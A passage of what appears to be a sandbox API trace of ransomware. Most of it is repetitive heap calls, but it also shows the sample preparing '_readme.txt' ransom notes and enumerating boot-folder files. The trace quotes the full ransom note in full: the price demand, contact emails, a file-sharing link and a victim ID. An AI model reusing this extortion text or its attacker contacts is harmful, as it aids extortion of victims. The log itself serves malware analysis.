hHeap=0x6a0000) returned 1 [0174.900] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.900] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.900] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.900] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.900] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.900] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.901] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.901] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.901] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.901] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.901] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.902] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.902] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.902] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.903] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.903] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.903] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.903] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.903] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.903] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.904] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.904] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.904] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.904] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.904] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.905] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.905] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.905] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.905] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.905] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.905] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.905] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.906] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.906] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.906] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.906] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.906] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.908] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.908] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.909] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.909] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.909] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.909] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.909] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.909] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.910] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.910] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.910] PathFindFileNameW (pszPath="C:\\Boot\\nb-NO\\") returned="nb-NO\\" [0174.910] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.910] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0174.910] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0174.910] PathFindFileNameW (pszPath="") returned="" [0174.910] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.910] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0174.910] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0174.910] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x800) returned 0x2d2ec90 [0174.910] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2d2ec90 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0174.910] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2d154b0 [0174.911] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278b0 [0174.911] FreeLibrary (hLibModule=0x759d0000) returned 1 [0174.911] PathAppendW (in: pszPath="C:\\Boot\\nb-NO\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned 1 [0174.911] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.914] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.914] PathFileExistsW (pszPath="C:\\Boot\\nb-NO\\_readme.txt") returned 0 [0174.915] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d00) returned 0x2d30670 [0174.915] lstrcpyW (in: lpString1=0x2d30670, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0174.915] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0174.915] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d16e48 [0174.915] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\_readme.txt" (normalized: "c:\\boot\\nb-no\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0174.916] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d16e48 | out: hHeap=0x6a0000) returned 1 [0174.916] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30670 | out: hHeap=0x6a0000) returned 1 [0174.917] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.917] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.917] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*" (normalized: "c:\\boot\\nb-no\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0174.918] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.918] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0174.918] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0174.918] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0174.918] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0174.918] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.919] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d276f8 | out: hHeap=0x6a0000) returned 1 [0174.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d276f8 [0174.919] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0174.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.919] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.919] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.920] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.920] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.921] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.921] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.921] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.921] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.921] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.922] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.922] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.922] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.922] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.922] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.922] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0174.923] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.923] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.923] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.923] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.923] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0174.923] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.923] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.924] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.924] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.924] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.924] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.924] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.924] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.924] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0174.924] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.925] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.925] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.925] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.925] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.925] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.925] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.925] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.925] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.926] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.926] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.926] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.927] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.927] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0174.928] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.928] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.928] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.928] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0174.928] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.929] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.929] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.929] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.930] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.930] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.930] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.930] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.930] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.930] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.930] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.931] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.931] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.931] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.931] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.931] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.931] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, 